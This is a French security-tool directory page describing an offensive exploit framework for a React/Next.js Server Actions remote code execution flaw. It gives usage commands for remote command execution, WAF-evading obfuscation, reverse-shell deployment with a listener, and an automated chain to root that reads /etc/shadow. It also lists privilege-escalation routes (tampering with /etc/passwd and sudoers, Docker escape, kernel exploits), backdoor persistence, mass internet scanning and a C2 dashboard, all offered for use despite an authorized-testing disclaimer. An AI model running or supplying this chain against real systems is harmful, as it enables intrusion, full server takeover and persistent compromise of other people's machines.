Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Cerberus-React2Shell-Scanner-Exploit — Kit d'exploitation élite pour CVE-2025-55182 (RCE des composants serveur React). Charges utiles polymorphes asynchrones, contournement avancé WAF/CDN, rotation de proxy, scan de masse Shodan/Censys, auto-pwn + shells inversés, modèles Nuclei, lab K8s et tableau de bord C2. Auteur : Sudeepa Wanigarathna – strictement réservé aux équipes rouges autorisées et aux tests d'intrusion. | Kitploit
Outils/GitHubGitHub/cerberusmrxi/cerberus-react2shell-scanner-exploit
Frameworks de Tests d'IntrusionEscalade de PrivilègesScanners de VulnérabilitésFrameworks d'ExploitationShellcodeExploitation d'Applications WebPost-ExploitationCommandement et ContrôleApprentissage et Éducation

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Red Teaming
Développement de Charges Utiles
Labs et Pratique
GitHubcerberusmrxi/cerberus-react2shell-scanner-exploit

Cerberus-React2Shell-Scanner-Exploit

Voir le dépôt
21il y a 1 moisPas encore vérifié

À propos

Kit d'exploitation élite pour CVE-2025-55182 (RCE des composants serveur React). Charges utiles polymorphes asynchrones, contournement avancé WAF/CDN, rotation de proxy, scan de masse Shodan/Censys, auto-pwn + shells inversés, modèles Nuclei, lab K8s et tableau de bord C2. Auteur : Sudeepa Wanigarathna – strictement réservé aux équipes rouges autorisées et aux tests d'intrusion.

Partager

Cerberus React2Shell - Framework d'Exploitation Armé

root@kitploit:~
  ██████╗ ███████╗██████╗ ██████╗ ███████╗██████╗ ██╗   ██╗
 ██╔════╝ ██╔════╝██╔══██╗██╔══██╗██╔════╝██╔══██╗██║   ██║
 ██║      █████╗  ██████╔╝██████╔╝█████╗  ██████╔╝██║   ██║
 ██║      ██╔══╝  ██╔══██╗██╔══██╗██╔══╝  ██╔══██╗██║   ██║
 ╚██████╗ ███████╗██║  ██║██████╔╝███████╗██║  ██║╚██████╔╝
  ╚═════╝ ╚══════╝╚═╝  ╚═╝╚═════╝ ╚══════╝╚═╝  ╚═╝ ╚═════╝

         Framework d'Exploitation React2Shell v1.0
              Auteur : Sudeepa Wanigarathna

🎯 Aperçu

Framework d'exploitation de qualité professionnelle pour la vulnérabilité d'exécution de code à distance (RCE) dans les Server Actions de Next.js (React2Shell). Démontre la chaîne d'attaque complète, de l'accès initial à l'escalade de privilèges root.

Capacités :

  • ✅ Détection automatisée des vulnérabilités
  • ✅ Exécution de code à distance (RCE)
  • ✅ Accès à un shell interactif
  • ✅ Énumération du système Linux
  • ✅ Escalade de privilèges automatisée
  • ✅ Déploiement de reverse shell
  • ✅ Upload/Download de fichiers
  • ✅ Démonstration d'accès root

🚀 Démarrage rapide

RCE de base

root@kitploit:~
# Vérifier la vulnérabilité
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --check

# Exécuter une commande
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "id"

Shell interactif

root@kitploit:~
python3 interactive_shell.py --target http://127.0.0.1:3000

Chaîne d'attaque automatisée complète

root@kitploit:~
# Exploitation complète : RCE → Énumération → Accès root
python3 demo_exploit.py --target http://127.0.0.1:3000 --auto-root

📁 Structure du framework

root@kitploit:~
Cerberus-React2Shell-Hades/
├── react2shell_exploit.py      # Moteur d'exploitation principal (400+ lignes)
├── demo_exploit.py              # Chaîne d'attaque automatisée (290+ lignes)
├── interactive_shell.py         # Shell interactif (280+ lignes)
├── reverse_shell_handler.py     # Écouteur de reverse shell (180+ lignes)
├── post_exploit/
│   ├── linux_enum.py           # Énumération système (330+ lignes)
│   ├── priv_esc.py             # Escalade de privilèges (320+ lignes)
│   └── __init__.py
├── EXPLOITATION_GUIDE.md        # Documentation d'utilisation complète
├── QUICKSTART.md                # Référence rapide
└── BANNER.txt

🔥 Fonctionnalités

Moteur d'exploitation principal

  • Découverte d'Action ID : Extraction automatique depuis les bundles JavaScript
  • Plusieurs charges utiles : Variantes execSync, spawn, eval, mainModule
  • Extraction de sortie : Analyse de la sortie des commandes depuis les réponses d'erreur
  • Contournement WAF : Techniques d'obfuscation des charges utiles

Post-exploitation

  • Énumération Linux : Binaires SUID/SGID, chemins inscriptibles, tâches cron, version du noyau
  • Escalade de privilèges : GTFOBins, fichiers /etc inscriptibles, échappement Docker, capacités
  • Opérations sur les fichiers : Upload/Download avec encodage base64
  • Persistance : Plusieurs méthodes de backdoor

Outils interactifs

  • Shell interactif : Exécution de commandes en temps réel avec commandes intégrées
  • Reverse shell : Plusieurs types de shell (bash, python, nc, perl)
  • Mode démo : Démonstration automatisée en 6 étapes

📖 Exemples d'utilisation

1. Commandes de base

root@kitploit:~
# Vérification de vulnérabilité
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --check

# Exécuter des commandes
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "whoami"
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "cat /etc/passwd"

# Variantes de charges utiles
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "id" --variant spawn

# Avec obfuscation
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "id" --obfuscate

2. Shell interactif

root@kitploit:~
# Lancer le shell
python3 interactive_shell.py --target http://127.0.0.1:3000

# Commandes disponibles :
# - execute <cmd>        : Exécuter une commande shell
# - enum                 : Lancer l'énumération complète
# - escalate             : Tenter l'escalade de privilèges
# - upload <local> <remote>  : Uploader un fichier
# - download <remote> <local>: Downloader un fichier
# - shell <lhost> <lport>: Déployer un reverse shell
# - info                 : Afficher les informations de session
# - exit                 : Quitter

3. Reverse shell

root@kitploit:~
# Terminal 1 : Démarrer l'écouteur
python3 reverse_shell_handler.py --lport 4444

# Terminal 2 : Déployer le shell
python3 react2shell_exploit.py --target http://127.0.0.1:3000 \
  --revshell --lhost 127.0.0.1 --lport 4444 --shell-type bash

4. Démo automatisée

root@kitploit:~
# Chaîne complète : Découverte → RCE → Énum → Root
python3 demo_exploit.py --target http://127.0.0.1:3000 --auto-root

🎯 Chaîne d'attaque

Le framework met en œuvre une chaîne d'exploitation complète en 6 étapes :

  1. Découverte - Extraire les Server Action IDs des bundles JavaScript
  2. Exploitation - Trouver un Action ID fonctionnel et obtenir une RCE
  3. Vérification - Confirmer l'exécution de code avec la commande id
  4. Énumération - Recueillir les informations système, les binaires SUID, les chemins inscriptibles
  5. Escalade - Exploiter automatiquement les vecteurs d'escalade de privilèges
  6. Démonstration - Prouver l'accès root en lisant /etc/shadow et en listant /root

🛡️ Techniques d'escalade de privilèges

Méthodes implémentées

  1. Binaires SUID (GTFOBins)

    • find, vim, python, perl, bash, awk, sed, less, more, nmap
  2. Fichiers /etc inscriptibles

    • /etc/passwd - Ajouter un nouvel utilisateur root
    • /etc/shadow - Effacer le mot de passe root
    • /etc/sudoers - Accorder sudo sans mot de passe (NOPASSWD)
  3. Échappement Docker

    • Exploitation du socket Docker accessible
    • Sortie de conteneur privilégié
  4. Exploits du noyau

    • DirtyCow (CVE-2016-5195)
    • Dirty Pipe (CVE-2022-0847)
    • PwnKit (CVE-2021-4034)
  5. Capacités Linux

    • Exploitation de CAP_SETUID, CAP_DAC_OVERRIDE

📊 Statistiques

  • Total de lignes de code : 1 800+
  • Modules : 8
  • Techniques d'escalade de privilèges : 5
  • Variantes de charges utiles : 4
  • Types de shell : 4 (bash, python, nc, perl)

⚙️ Prérequis

root@kitploit:~
pip install -r requirements.txt

Dépendances :

  • requests
  • colorama

📚 Documentation

  • EXPLOITATION_GUIDE.md - Guide d'utilisation complet avec exemples
  • QUICKSTART.md - Référence rapide pour les commandes courantes

⚠️ Avertissement

ATTENTION : Cet outil est destiné uniquement aux tests de sécurité autorisés. L'accès non autorisé à des systèmes informatiques est illégal. Utilisez-le uniquement sur des systèmes que vous possédez ou pour lesquels vous avez une autorisation écrite explicite de test.

L'auteur n'est pas responsable de toute utilisation abusive de cet outil. Utilisez-le à vos propres risques.

🎓 Objectif pédagogique

Ce framework est conçu pour :

  • Les chercheurs en sécurité étudiant les vulnérabilités de Next.js
  • Les testeurs d'intrusion autorisés
  • Les formations en sécurité et les challenges CTF
  • La recherche de vulnérabilités dans des environnements de laboratoire contrôlés

📄 Licence

Licence MIT (À des fins éducatives uniquement)

👤 Auteur

Sudeepa Wanigarathna

  • Expert en développement d'exploits
  • Chercheur en sécurité
  • Testeur d'intrusion

Version : 1.0 Dernière mise à jour : Décembre 2025 Statut du laboratoire : http://127.0.0.1:3000 (En cours d'exécution)

Pour des instructions d'utilisation détaillées, voir EXPLOITATION_GUIDE.md

Télécharger l’outil